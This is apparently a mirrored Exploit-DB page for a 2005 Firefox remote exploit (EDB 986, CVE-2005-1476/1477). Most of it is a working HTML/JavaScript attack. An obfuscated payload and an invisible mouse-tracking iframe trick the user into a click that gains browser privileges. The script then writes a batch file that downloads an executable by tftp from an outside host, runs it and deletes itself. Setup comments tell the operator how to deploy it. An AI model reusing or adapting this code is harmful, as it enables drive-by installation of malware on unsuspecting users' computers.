- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 986
- Проверка EDB
-
- Пройдено
- Автор
- EDWARD GAGNON
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2005-1476 cve-2005-1477
- Дата публикации
- 2005-05-07
HTML:
<!--
1) wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js (05072005.js)
2) change src= below
3) edit index and change tftp location
/str0ke
-->
<html><head><title>hide me bitch</title>
<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">
<script language="javascript" src="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js"></script></head>
<body>
<script language="JavaScript"><!--
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--\nPAHSBMGH OQBuFFZQDCMGH(){\nUFFHUIQ= HU9MOUBGD.UFFhUIQ;\nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;\nIULGD9QD = UFF9QDCMGH.CATCBDMHO(\", #);\nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;\nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;\nDQBADH \";\n}\n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\\'CBQUJSGGKMQC\\'){8MHRG8.HUIQ=\\'CBQUJSGGKMQC\\';} QJCQ{ Q9QHB={BUDOQB:{NDQP:\\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-\".z.v.#-P7+I5+BT.7FM\\'}};MHCBUJJ(Q9QHB,\\'WGA UDQ 9AJHQDUTJQ!!!\\',\\'LU9UCSDMFB:Q9UJ(\\\\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(");
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\\\\\\\\'S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]\");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,\"7\"<|\"7\"w|\"7]\",<]\",\");GABFAB=\\\\\\\\\\\\\\'BPBF -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\");
d("\\\\\\HRQJ %\"\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\\\\')\\'); }')+'4/HGCSDMFB34U NDQP=\\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]\"&UFFJMSUBMGH=PMDQPG7\\' CB6JQ=\\'SADCGD:RQPUAJB;\\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0\"0 IUDOMH8MRBN=0\"0 IUDOMHNQMONB=\"0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:\"F7; 8MRBN:\"F7; NQMONB:yF7; 8MRBN:yF7; IUDOMH:\"F7; FURRMHO:\"F7; -IG5-GFUSMB6:\"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03\n\nRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {\n RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB = (Q.FUOQX->)+0F70\n RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70\n} \n\n9UD SGAHBQD = \"; \nPAHSBMGH JGURQD() {\n SGAHBQD++\n MP(SGAHBQD == #) {\n CBQUJSGGKMQC.PGSAC()\n } QJCQ MP(SGAHBQD == ]) {\n CBQUJSGGKMQC.NMCBGD6.OG(-#)\n //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;\n }\n}\n\n4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//--></script>
<script language="JavaScript"><!--
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#\"";function codeIt (mC, eS) {var wTG, mcH = mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//--></script><script language="JavaScript"><!--
Decode();document.write(ky);//--></script><script language="javascript"><!--
function getAppVersion(){
appname= navigator.appName;
appversion = navigator.appVersion;
majorver = appversion.substring(0, 1);
if ( (appname == "Netscape") && ( majorver >= 3 ) ) return 1;
if ( (appname == "Microsoft Internet Explorer") && (majorver >= 4) ) return 1;
return 0;
}
//--></script>i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\\\\\\\'tftp -i ill[server]oab.zapto.org get test.exe c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ncls\\\\\\\\nstart c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ndel %0\\\\\\\\ncls\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\' style=\'cursor:default;\'> </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position: absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe><script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
<script language="javascript">postamble();</script>
</body></html>
# milw0rm.com [2005-05-07]
- Источник
- www.exploit-db.com